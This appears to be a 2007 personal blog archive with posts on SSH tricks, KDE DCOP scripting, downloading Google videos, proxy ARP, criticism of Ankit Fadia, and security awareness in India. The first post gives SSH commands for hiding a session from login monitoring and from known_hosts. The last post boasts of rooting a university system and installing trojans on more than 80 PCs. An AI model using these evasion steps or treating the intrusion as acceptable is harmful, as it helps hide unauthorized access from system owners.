2007-12-04T23:10:00.001-08:00

In the worse case if you have to ssh on a box, do it every time
with no tty allocation

ssh -T user@host

If you connect to a host with this way, a command like "w" will not
show your connection. Better, add 'bash -i' at the end of the command to
simulate a shell

ssh -T user@host /bin/bash -i

Another trick with ssh is to use the -o option which allow you to
specify a particular know_hosts file (by default it's ~/.ssh/know_hosts).
The trick is to use -o with /dev/null:

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

With this trick the IP of the box you connect to won't be logged in
know_hosts.

Using an alias is a good idea.

------------------------------------------------------------------
credits: An artical by Duvel in phrack magazine
------------------------------------------------------------------

DCOP: Scripting the KDE Desktop

2007-10-17T05:31:00.000-07:00

KDE provides a powerful interprocess communication system in DCOP, the Desktop COmmunication Protocol. Using DCOP, you can control a wide range of functions in KDE from the command line or from a script written in your favorite scripting language. You can also get information out of KDE applications: for example, several KDE media players provide methods to query the player for information about the currently-playing track.

For the whole Artical can be seen HERE

I found this when I was trying to write a script that will change my desktop to the Daily comic strip Dilbert automatically
Then I found the DCOP command
Example
#dcop kdesktop KBackgroundIface setWallpaper /tmp/dilbert.gif 1

The Above command will change your desktop wallpaper to /tmp/dilbert.gif

If any one interested to see the script the script is at link given bellow
python script source code

Script to Automate Download Google Videos

2007-10-14T23:31:00.000-07:00

I had to download a large number of google videos this week. But I was fade up with the pasting the url in to sites like keepvid.com then click on the download links then downlaod videos. I had a defined list of videos to be downlaoded, so I decided to write my own programm to download these files automatically from a commandline program.
My program reads the filename given in the commndline and then treats each line of the file as a google video entry and filename given separated by pipe.
Format is as shown bellow

# cat testurl.txt
http://video.google.com/videoplay?docid=2889527841583480458|testvdo.flv
http://video.google.com/videoplay?docid=1332505621497959742|testvdo2.flv
#
(testurl.txt can be downloaded from HERE

The python code is as given bellow

Python Code File
I am too lazy to format code in blogger post, so I have uploaded the file.

Save the python code as file name getvdo.py
make sure you have testurl.txt file with the google video urls, then run the code by command given bellow
[code]
python getvdo.py testurl.txt
[/code]

Any suggestions welcome
Now Some LEGAL Crap

Is this tool legal?

From http://www.google.com/terms_of_service.html: "You may not send
automated queries of any sort to Google's system without express
permission in advance from Google."

This means that you should not use this tool to query Google without
advance express permission. Google appliances, however, do not have these
limitations. You should, however, obtain advance express permission from
the owner or maintainer of the Google appliance before searching it with
any automated tool for various legal and moral reasons.

The author wrote this tool not to violate Google's terms of service (ToS)
but to automate some of his work.

Beware of Ankit Fadia

2007-08-22T05:08:00.000-07:00

I have herd lots of times of newbies that they are very inspired by So called hacker Ankit Fadia, When I was in college I had also braught his first book on "Ethical Hacking"( which was full of CRAP). I herd he has started his own Certified Ethical Hacker courses, trying to fool people.
Some of my juniors were asking whether they should joined that course. First I thought it was CEH certification aided by these freaks. But it is not, it is Ankit Fadia Certified Ethical Hacker. I was could not stop laughing when I saw that this fellow has started his own certification course, which has offcourse ZERO value in any place you go. I have instructed my all contacts not to go for this kind of crap.
I am realy amzed what kinda effects the indian media has created about this Ankit fadia. Well I think that indian media is not that literate about the information security.

I recommend to readers not waste your time and money on the any crap from Mr Ankit Fadia.

Read other people's thoughts about ankit fadia at these urls

http://attrition.org/errata/www/fadia1.html
http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009654.html

Here are some more links about crap of Ankit Fadia

http://kalpeshsharma.wordpress.com/ - Article by security consultant about Fadia
http://forum.techspot.in/showthread.php?t=2380 - Article from some one who attended Fadia's seminar

Here is official site of Fadia CEH
http://www.hackingmobilephones.com/afceh/

Some crap conteent from his Course Details page is as bellow

Want to be recognized for your computer security expertise? Want to be considered amongst the best security gurus in the world? Want to climb up the career ladder and improve your global job prospects? Want to be trained and certified by world renowned author and computer security guru? Want to become an ANKIT FADIA CERTIFIED ETHICAL HACKER?

ROFL

How to implement Proxy ARP on linux box

2007-07-27T04:18:00.000-07:00

Note If you dont know what is proxy arp then stop reading this
and read this first http://en.wikipedia.org/wiki/Proxy_arp

The scenario before implementation of Proxy ARP is as bellow (Before Proxy ARP)
There is a server (10.10.10.3) on the LAN (10.10.10.0/24) that
we want to put in to DMZ. But normally if we move the server we
have to change its ip address and put it into different lan network
But by using proxy arp we can port the server to DMZ without changing
any configuration like ip address.

Before proxy ARP


         |
         | eth1
     +-------+
     |Linux  |-- eth2
     |Box    |
     +-------+
        |
        | eth0
        | 10.10.10.0/24
        |
----|---|--------|----------
    |            | 
   10.10.10.3   10.10.10.?
    Server

After implementation of the Proxy arp we can put the Server directly connected to eth2
without changing its ip address.

To implement proxy ARP following steps should be followed

1.Turn on the proxy ARP option on the selected interfaces
To do this we have to put value 1 in to the proc file.

echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth2/proxy_arp

2. Delete Route of LAN from eth0

route del -net 10.10.10.0 netmask 255.255.255.0 dev eth0

3. Add Routes for proxy ARP

route add 10.10.10.3 dev eth0
route add -net 10.10.10.0 netmask 255.255.255.0 dev eth0

Now the Proxy ARP is working and the Systems in the LAN (10.10.10.0/24) will
be able to communicate with server (10.10.10.3) similar to what that was before
proxy arp. Now you can put the iptables rules to prevent/allow access the server if you want.

After Proxy ARP


        |
        | eth1
    +-------+
    |Linux  |------- 10.10.10.3
    |Box    | eth2
    +-------+
        |
        | eth0
        | 10.10.10.0/24
        |
----|---|--------|----
    |            |

Lack of Information Security Conern in India - Part 2

2007-07-18T21:50:00.000-07:00

Continuing from where I left...
The only sector which has a little bit of sense of security is the financial sector.
That too they have learned from the foreign financial institutes. There has been lots
of wire frauds, cracking in the financial sector. Lots of time this kind of cracking is
done by a script kiddie.
(For the Dummies: Script Kiddie is a person who just downloads
some programs and try to attack on a computer system without understanding what the program
does. I have also seen conditions where the script kiddies are using some windowz cracking program
against the linux sytems)
The most famous crack in the financial sector is phishing ( pronounced as Fishing).
Phishing is done by using social engineering techniques. Phishers attempt to fraudulently acquire
sensitive information, such as usernames, passwords and credit card details, by acting as a mail came from the financial institute. eBay and PayPal are two of the most targeted companies, and online banks are also common targets.
Phishing also work most of the times when there is no concern about security in the users mind. No I have a concern for
security. i know that no bank in the world will ask me to send my password in the mail. But lots of normal users dont
understand this. Phishing also used Fake websites lots of times. But if the user is carefull to look at the url bar to
see that the url of the site is different that the url user is visiting then harm can be avoided. I know some of you will say that there are some java scripts that try to cover the address bar by a image of the leagal url. But this type
of phishing is more sophisticated and not that much in numbers. (If we disable javascript for unknown site we can stop this kind of attack.) Lot more phishing is done by script kiddies than the pros. I wont say we will be 100% percent secure but with a little bit of awareness we can avoid these script kiddies. So I again say that awareness in people is must.

Lack of Information Security Conern in India

2007-07-08T22:59:00.000-07:00

When 2-3 Days Ago I was watching some news of one indian university network was hacked by some nygerian hacker. News channel was telling that he hacked their mail server. And stole their economic information.I am very much surprise that how much ignorance is in theindian people aobut the importance of the information security.
    I have seen in my own university also. When I was university I was able to get the root access of the linux system very easly that was giving shared access to the students. Also I was able to torjen the whole network, every PC wasunder my control. Though I did not do any damage, (damaging system never gains anything, unless you are getting paid to damge the system, but a real hacker will never damage the system) I was very surprise to see the lack of security. There were more than 80 computers having internet access on which I had installed RAT (Remote Access Trojan) So if I wished I could use them as Bot-Network to do any kind of attack.
      I think the history repeats itself, as in america first the hackers and system security were not given any notice. But when cracker get in the situation, they started damaging systems, or shutting down telphone networks, etc. Then one day american governmentgot awake of sudden and started hunting the hackers. India also is on the samepath. You will be surprised to hear that one fren of mine who is in marketing the firewall and IDS (Intruder Detection System) tell me that the product is not sold by how much security it provides but most of the times to just manage the network bandwidth, block the URLs for users. He says he has till this date not mate with a CTO who has genuine interest in the security of his network. After some big attacks by some cracker the people will awake. But do we want this ?
   I think the people should become aware before such things. We should make people aware of things. In my later blogs I will try to handle more such issues.
   -neo